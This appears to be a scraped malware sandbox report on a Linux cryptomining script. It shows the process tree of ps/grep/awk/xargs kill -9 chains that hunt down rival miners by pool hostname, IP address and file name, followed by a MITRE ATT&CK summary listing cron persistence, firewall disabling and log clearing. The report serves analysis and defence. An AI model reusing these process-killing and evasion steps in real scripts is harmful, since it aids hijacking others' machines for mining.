/bin/grepgrep wget2⤵PID:2351
-
/bin/grepgrep he.sh2⤵PID:2350
-
/bin/grepgrep -v grep2⤵PID:2349
-
/bin/psps aux2⤵
- Process Discovery
PID:2348 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2359
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2358
-
/bin/grepgrep curl2⤵PID:2357
-
/bin/grepgrep he.sh2⤵PID:2356
-
/bin/grepgrep -v grep2⤵PID:2355
-
/bin/psps aux2⤵
- Process Discovery
PID:2354 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2365
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2364
-
/bin/grepgrep wget2⤵PID:2363
-
/bin/grepgrep miner.sh2⤵PID:2362
-
/bin/grepgrep -v grep2⤵PID:2361
-
/bin/psps aux2⤵
- Process Discovery
PID:2360 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2371
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2370
-
/bin/grepgrep curl2⤵PID:2369
-
/bin/grepgrep miner.sh2⤵PID:2368
-
/bin/grepgrep -v grep2⤵PID:2367
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2366 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2377 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2376
-
/bin/grepgrep wget2⤵PID:2375
-
/bin/grepgrep nullcrew2⤵PID:2374
-
/bin/grepgrep -v grep2⤵PID:2373
-
/bin/psps aux2⤵PID:2372
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2383
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2382
-
/bin/grepgrep curl2⤵PID:2381
-
/bin/grepgrep nullcrew2⤵PID:2380
-
/bin/grepgrep -v grep2⤵PID:2379
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2378 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2388
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2387
-
/bin/grepgrep 107.174.47.1562⤵PID:2386
-
/bin/grepgrep -v grep2⤵PID:2385
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:2384 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2393
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2392
-
/bin/grepgrep 83.220.169.2472⤵PID:2391
-
/bin/grepgrep -v grep2⤵PID:2390
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2389 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2398
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2397
-
/bin/grepgrep 51.38.203.1462⤵PID:2396
-
/bin/grepgrep -v grep2⤵PID:2395
-
/bin/psps aux2⤵PID:2394
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2403
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2402
-
/bin/grepgrep 144.217.45.452⤵PID:2401
-
/bin/grepgrep -v grep2⤵PID:2400
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2399 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2408
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2407
-
/bin/grepgrep 107.174.47.1812⤵PID:2406
-
/bin/grepgrep -v grep2⤵PID:2405
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2404 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2413
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2412
-
/bin/grepgrep 176.31.6.162⤵PID:2411
-
/bin/grepgrep -v grep2⤵PID:2410
-
/bin/psps aux2⤵PID:2409
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2418
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2417
-
/bin/grepgrep mine.moneropool.com2⤵PID:2416
-
/bin/grepgrep -v grep2⤵PID:2415
-
/bin/psps auxf2⤵PID:2414
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2423
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2422
-
/bin/grepgrep pool.t00ls.ru2⤵PID:2421
-
/bin/grepgrep -v grep2⤵PID:2420
-
/bin/psps auxf2⤵PID:2419
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2428
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2427
-
/bin/grepgrep xmr.crypto-pool.fr:80802⤵PID:2426
-
/bin/grepgrep -v grep2⤵PID:2425
-
/bin/psps auxf2⤵
- Reads CPU attributes
PID:2424 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2433
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2432
-
/bin/grepgrep xmr.crypto-pool.fr:33332⤵PID:2431
-
/bin/grepgrep -v grep2⤵PID:2430
-
/bin/psps auxf2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2429 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2438
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2437
-
/bin/grepPID:2436
-
/bin/grepgrep -v grep2⤵PID:2435
-
/bin/psps auxf2⤵PID:2434
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2443
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2442
-
/bin/grepgrep monerohash.com2⤵PID:2441
-
/bin/grepgrep -v grep2⤵PID:2440
-
/bin/psps auxf2⤵PID:2439
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2448
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2447
-
/bin/grepgrep /tmp/a7b104c2702⤵PID:2446
-
/bin/grepgrep -v grep2⤵PID:2445
-
/bin/psps auxf2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2444 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2453
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2452
-
/bin/grepgrep xmr.crypto-pool.fr:66662⤵PID:2451
-
/bin/grepgrep -v grep2⤵PID:2450
-
/bin/psps auxf2⤵PID:2449
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2458
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2457
-
/bin/grepgrep xmr.crypto-pool.fr:77772⤵PID:2456
-
/bin/grepgrep -v grep2⤵PID:2455
-
/bin/psps auxf2⤵
- Reads runtime system information
PID:2454 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2463 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2462
-
/bin/grepgrep xmr.crypto-pool.fr:4432⤵PID:2461
-
/bin/grepgrep -v grep2⤵PID:2460
-
/bin/psps auxf2⤵PID:2459
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2468
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2467
-
/bin/grepgrep stratum.f2pool.com:88882⤵PID:2466
-
/bin/grepgrep -v grep2⤵PID:2465
-
/bin/psps auxf2⤵PID:2464
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2473 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2472
-
/bin/grepgrep xmrpool.eu2⤵PID:2471
-
/bin/grepgrep -v grep2⤵PID:2470
-
/bin/psps auxf2⤵PID:2469
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2477
-
/usr/local/sbin/killkill -9 24753⤵PID:2478
-
/usr/local/bin/killkill -9 24753⤵PID:2478
-
/usr/sbin/killkill -9 24753⤵PID:2478
-
/usr/bin/killkill -9 24753⤵PID:2478
-
/sbin/killkill -9 24753⤵PID:2478
-
/bin/killkill -9 24753⤵
- Reads CPU attributes
PID:2478 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2476
-
/bin/grepgrep xiaoyao2⤵PID:2475
-
/bin/psps auxf2⤵
- Reads CPU attributes
PID:2474 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2482 -
/usr/local/sbin/killkill -9 24803⤵PID:2483
-
/usr/local/bin/killkill -9 24803⤵PID:2483
-
/usr/sbin/killkill -9 24803⤵PID:2483
-
/usr/bin/killkill -9 24803⤵PID:2483
-
/sbin/killkill -9 24803⤵PID:2483
-
/bin/killkill -9 24803⤵PID:2483
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2481
-
/bin/grepgrep xiaoxue2⤵PID:2480
-
/bin/psps auxf2⤵PID:2479
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2489
-
/bin/sedsed -e "s/\\/.*//g"2⤵PID:2488
-
/usr/bin/awkawk "{print \$7}"2⤵PID:2487
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵PID:2486
-
/bin/grepgrep 46.243.253.152⤵PID:2485
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2495 -
/bin/sedsed -e "s/\\/.*//g"2⤵PID:2494
-
/usr/bin/awkawk "{print \$7}"2⤵PID:2493
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵PID:2492
-
/bin/grepgrep 176.31.6.162⤵PID:2491
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2501
-
/bin/sedsed -e "s/\\/.*//g"2⤵PID:2500
-
/usr/bin/awkawk "{print \$7}"2⤵PID:2499
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵PID:2498
-
/bin/grepgrep 108.174.197.762⤵PID:2497
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2507
-
/usr/bin/awkawk "{print \$7}"2⤵PID:2505
-
/bin/sedsed -e "s/\\/.*//g"2⤵PID:2506
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵PID:2504
-
/bin/grepgrep 192.236.161.62⤵PID:2503
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2513
-
/bin/sedsed -e "s/\\/.*//g"2⤵PID:2512
-
/usr/bin/awkawk "{print \$7}"2⤵PID:2511
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵PID:2510
-
/bin/grepgrep 88.99.242.922⤵PID:2509
-
/usr/bin/pkillpkill -f pastebin2⤵
- Reads runtime system information
PID:2514 -
/usr/bin/pkillpkill -f 185.193.127.1152⤵PID:2515
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2517
-
/usr/bin/pgreppgrep -f monerohash2⤵PID:2516
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2519 -
/usr/bin/pgreppgrep -f L2Jpbi9iYXN2⤵
- Reads CPU attributes
PID:2518 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2521
-
/usr/bin/pgreppgrep -f xzpauectgr2⤵PID:2520
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2523
-
/usr/bin/pgreppgrep -f slxfbkmxtd2⤵
- Reads runtime system information
PID:2522 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2525
-
/usr/bin/pgreppgrep -f mixtape2⤵PID:2524
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2527
-
/usr/bin/pgreppgrep -f addnj2⤵PID:2526
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Sudo and Sudo Caching (1)
- Scheduled Task/Job (1)
  - Cron (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Sudo and Sudo Caching (1)
- File and Directory Permissions Modification (1)
  - Linux and Mac File and Directory Permissions Modification (1)
- Impair Defenses (2)
  - Disable or Modify System Firewall (1)
  - Disable or Modify Tools (1)
- Indicator Removal (1)
  - Clear Linux or Mac System Logs (1)
Downloads